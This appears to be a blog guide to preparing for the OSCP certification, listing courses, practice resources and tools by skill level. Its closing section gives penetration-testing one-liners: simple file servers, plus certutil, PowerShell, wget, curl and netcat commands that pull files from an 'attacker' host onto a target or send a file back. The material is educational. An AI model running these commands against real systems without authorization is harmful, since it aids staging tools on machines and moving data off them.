So you are looking to become an Offensive Security Certified Professional (OSCP) ?
You have come to the right place! This guide is intended to help those at every level, beginner through advanced, prepare for the OSCP exam. Recommended courses, resources and tools will be provided. The guide is aimed at three skill levels, beginner, intermediate, and advanced.
Each of the categories are defined in the following way:
- Beginner — No penetration testing or capture-the-flag (CTF) experience but yet has knowledge on networking topics (Network+, CCNA, Open Systems Interconnection model, etcetera). No Active Directory (AD) configuration experience.
- Intermediate — Has some CTF, red teaming, or penetration testing experience as well as beginner level penetration testing certifications (eJPT, PenTest+, etcetera). Some AD configuration experience.
- Advanced — Experienced penetration tester holding advanced penetration testing certifications (PNPT, CRTP, eCPPTv2, etcetera). Experienced in AD.
Courses
Within this section I will list courses for individuals in each level. Please be realistic in determining the level that applies to you as starting off on the wrong path can be costly. I highly suggest reviewing the PEN-200 course syllabus to help you gauge your level.
The courses mentioned below are by no means the only way to pass the exam. You will notice that some courses are found in more than one section, this is because some of the materials within the course apply to more than one skill level or somewhere in-between.
NOTE: I did not enroll in all of the courses listed. If interested in learning about my preparation and experience, please click here. These courses are not listed in any particular order and prices are subject to change.
Beginner
The following courses are for my readers who are beginners in the world of penetration testing.
- PEN-100 course ($799) — This course is offered by Offensive Security and teaches Linux basics, Windows basics, networking, and scripting. The PEN-100 is part of a the one year subscription package, Learn Fundamentals, which also includes access to SOC-100, WEB-100, EXP-100, and CLD-100. This course primes beginners for the SOC-200 course.
- Practical Ethical Hacking course ($29.99)— TCM Security offers this course which includes 25 hours of up to date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.
- Linux Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Linux privilege escalation techniques. Covering kernel exploits, password hunting, file permissions, SUID attacks, shared object injection, and more.
- Windows Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Windows privilege escalation techniques. Covering kernel exploits, impersonation attacks, registry attacks, startup applications, DLL hijacking, service permissions, and more.
- Offensive Pentesting Learning Path ($9.99/month) — TryHackMe offers an offensive penetration testing learning path designed to help students prepare for certifications like the OSCP.
- Penetration Testing Student Learning Path ($39/month) — Offered by INE, you will have access to material centered around beginner penetration testing, helping students prepare for the eJPT exam.
Intermediate
For those at an intermediate level, I suggest looking into the following courses.
- PEN-200 course ($1499) — The PEN-200 course offered by Offensive Security is the staple course for the OSCP exam. The materials found in the course were specifically crafted to help students learn the skills needed for the exam. You will receive an online PDF (also available for download), access to a lab environment containing over 70 machines, and videos covering all of the topics.
- Practical Ethical Hacking course ($29.99) — TCM Security offers this course which includes 25 hours of up to date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.
- Linux Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Linux privilege escalation techniques. Covering kernel exploits, password hunting, file permissions, SUID attacks, shared object injection, and more.
- Windows Privilege Escalation for Beginners ($29.99) — TCM Security’s course on Windows privilege escalation techniques. Covering kernel exploits, impersonation attacks, registry attacks, startup applications, DLL hijacking, service permissions, and more.
Advanced
If you are advanced level, the PEN-200 course is really all you need. I even feel comfortable suggesting the Practical Ethical Hacking course from TCM Security as being enough to pass the exam. This advice is only applicable if you are truly at an advanced level.
- PEN-200 course ($1499) — The PEN-200 course offered by Offensive Security is the staple course for the OSCP exam. The materials found in the course were specifically crafted to help students learn the skills needed for the exam. You will receive an online PDF (also available for download), access to a lab environment containing over 70 machines, and videos covering all of the topics.
- Practical Ethical Hacking course ($29.99) — TCM Security offers this course which includes 25 hours of up to date practical hacking techniques. You are also guided on setting up your own AD lab environment and how to attack it.
A Quick Word on The PEN-200 Course
Some of you are probably thinking that the PEN-200 course should be enough to pass no matter what level you are on. If time is not a factor and you are not concerned with the hefty price tag, the course alone is enough for all levels. The cost of the course will increase pro rata with study time, of course. The table below breaks-down how long you should expect to study the PEN-200 at each level.
Resources
The following resources can be used to complement your learning at all levels.
- Offensive Security Proving Grounds Practice ($19/month) — Gives you unlimited time to practice on Offensive Security machines.
- Offensive Security Proving Grounds Play (free) — You get up to 3 hours per day of free access to Offensive Security machines.
- Ippsec’s Youtube videos and website (free)— Ippsec has many CTF walkthroughs on his Youtube channel and shares invaluable details on the tools he uses and why they work. His website has a cool lookup feature which searches for videos by using keywords.
- Active Directory walkthrough playlist (free)— Here is a neat playlist of Ippsec specifically attacking Active Directory environments.
- TryHackMe (free)— TryHackMe has many free rooms to practice and improve your penetration testing skills.
Cheat Sheets
In this section you will find a few handy cheat sheets to help you on assessments.
Active Directory
Windows Privilege Escalation
Linux Privilege Escalation
Tools to Know
You should become familiar with all of the tools in the following list. They are not the only tools needed to be learned for the exam. I simply found these tools to be extremely helpful in my own preparation.
Windows
Linux
Servers
In this section you will find several one-liners used to help transfer files from Linux systems.
python3 http server
┌──(N3NU㉿kali)-[~]
└─$ python3 -m http.server 80python2 http server
┌──(N3NU㉿kali)-[~]
└─$ python2 -m SimpleHTTPServer 80php http server
┌──(N3NU㉿kali)-[~]
└─$ php -S 0.0.0.0:80ruby http server
┌──(N3NU㉿kali)-[~]
└─$ ruby -run -e httpd . -p 80python3 ftp server
┌──(N3NU㉿kali)-[~]
└─$ python3 -m pyftpdlib -p 21 smb server
┌──(N3NU㉿kali)-[~]
└─$ impacket-smbserver Share .Transferring Files
In this section I will provide a few methods of transferring files during engagements.
NOTE: The attacker IP address is 10.10.10.10 and the target IP is 20.20.20.20
Windows
certutil
C:\>certutil -urlcache -f http://10.10.10.10/file.txt file.txtPowershell
C:\>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.txt', 'file.txt')net use
C:\>net use * \\10.10.10.10\Shareftp
C:\>ftp 10.10.10.10Linux
wget
┌──(kali㉿kali)-[~]
└─$ wget http://10.10.10.10/file.txt -O file.txtcurl
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.233.129/file.txt -o file.txtscp
┌──(kali㉿kali)-[~]
└─$ scp N3NU@10.10.10.10:/home/N3NU/file.txt kali@20.20.20.20:/tmp/nc
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444 > file.txt┌──(N3NU㉿kali)-[~]
└─$ nc 20.20.20.20 4444 < file.txt
This is a living document, I will continue to update it as I review more of my notes and receive feedback.
I am soon releasing blogs covering how to use some of the tools mentioned above, do not miss out! Feel free to also follow me on Linkedin.
Until next time…
— N3NU
Disclaimer: My content is for informational and educational purposes only. You may try out these hacks on your own computer at your own risk.
